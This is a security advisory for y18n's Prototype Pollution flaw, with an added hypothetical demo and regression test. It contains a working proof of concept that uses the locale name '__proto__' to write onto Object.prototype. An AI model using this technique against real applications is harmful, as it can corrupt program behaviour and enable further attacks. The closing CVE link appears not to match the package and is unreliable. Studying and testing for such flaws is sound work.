The package y18n before 3.2.2, 4.0.1 and 5.0.5 is vulnerable to Prototype Pollution.
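Prototype Pollution in y18n

### Overview

The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.

### POC

```js
const y18n = require('y18n')();

// Selecting "__proto__" as the locale makes the locale cache lookup resolve to Object.prototype.
y18n.setLocale('__proto__');
// The update is then written onto Object.prototype instead of a per-locale object.
y18n.updateLocale({polluted: true});

console.log(polluted); // true
```

### Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.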
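The following added example is not y18n's source code and is not part of the original advisory. It uses a hypothetical minimal locale store (`makeLocaleStore`, `isPolluted`, `demo` and the key `pollutedDemo` are assumed names) to show why the sequence in the POC reaches `Object.prototype` when the cache is a plain object, and why a null-prototype cache does not have that behaviour.

```javascript
// Hypothetical minimal locale store, modelled only on the setLocale /
// updateLocale sequence shown in the POC. Not y18n's implementation.
function makeLocaleStore(cache) {
  let locale = 'en';
  return {
    setLocale(name) { locale = name; },
    updateLocale(entries) {
      // With a plain {} cache, cache['__proto__'] resolves to Object.prototype,
      // so it looks like an existing locale and the loop writes onto it.
      if (!cache[locale]) cache[locale] = {};
      for (const key of Object.keys(entries)) {
        cache[locale][key] = entries[key];
      }
    },
  };
}

// Runs the POC sequence against a store built on the given cache and reports
// whether a brand-new, unrelated object picked up the injected key.
function isPolluted(cache) {
  const store = makeLocaleStore(cache);
  store.setLocale('__proto__');
  store.updateLocale({ pollutedDemo: true }); // constructed sample entry
  const leaked = ({}).pollutedDemo === true;
  delete Object.prototype.pollutedDemo; // clean up so runs stay independent
  return leaked;
}

function demo() {
  return {
    // Plain object: inherits the __proto__ accessor, so the write escapes.
    plainObjectCache: isPolluted({}),
    // Null-prototype object: "__proto__" is just an ordinary own key.
    nullPrototypeCache: isPolluted(Object.create(null)),
  };
}

console.log(demo());
```

In application code that cannot be upgraded immediately, the same check can be used as a regression test around any wrapper that passes user-controlled locale names to a translation cache.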
https://nvd.nist.gov/vuln/detail/CVE-2022-0691